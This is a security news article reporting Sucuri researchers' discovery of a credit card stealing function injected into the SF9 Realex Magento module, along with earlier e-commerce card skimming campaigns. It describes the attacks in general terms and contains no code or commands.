Attackers continue to take aim at the e-commerce platform Magento. Researchers said last week they came across a malicious function snuck into one of the platform’s modules in order to steal credit card information.
Code for the function was injected into a .php file for SF9 Realex, a module that helps sites store customer credit card data for the one-click checkout functionality commonly used by repeat customers. The module interacts with the Realex RealAuth Remote and Redirect systems, “very popular solutions in the Magento community,” according to Bruno Zanelato, a researcher with the firm Sucuri, who found the malicious function.
The function, sendCCNumber(), reroutes credit card information entered by a customer from Magento to an attacker’s email address, hidden inside a variable later in the code. The data, encoded in JSON, arrives in the attacker’s inbox without the victim being any the wiser.
According to researchers, the attacker uses binlist.net, a public web service for searching issuer identification numbers (IIN), to help identify which bank each card is associated with.
Zanelato said Friday that attackers are going greater lengths to target credit card data, especially in e-commerce platforms like Magento.
“Magento credit card stealers are indeed on the rise,” Zanelato wrote Friday, “While the information here is specific to Magento, realize that this can affect any platform that is used for ecommerce. As the industry grows, so will the specific attacks targeting it.”
Zanelato is quick to point out that there wasn’t a vulnerability in Magento that enabled the theft of credit card data. Instead he claims an attacker exploited a different, unnamed vulnerability in the website where the e-commerce platform is hosted. From there the attacker was able to inject script and takeover SF9 Realex.
It’s the latest in a line of credit card stealers Sucuri researchers have observed taking advantage of Magento, however.
Last summer Cesar Anjos, a researcher with the firm looked at one stealer that was loaded from another source. The stealer essentially performed a man-in-the-middle attack between the user and the checkout page after credit card information was entered. Last October, Ben Martin, a different researcher with the firm, discovered attackers scraping credit card numbers and exfiltrating them in obscure, sometimes publicly viewable image files.
Researchers with RiskIQ monitored attacks similar to ones described by Sucuri last year. The firm said the attacks it had been monitoring originated from a single hacking group targeting e-commerce platforms such as Powerfront CMS and OpenCart with a web-based keylogger in March 2016.
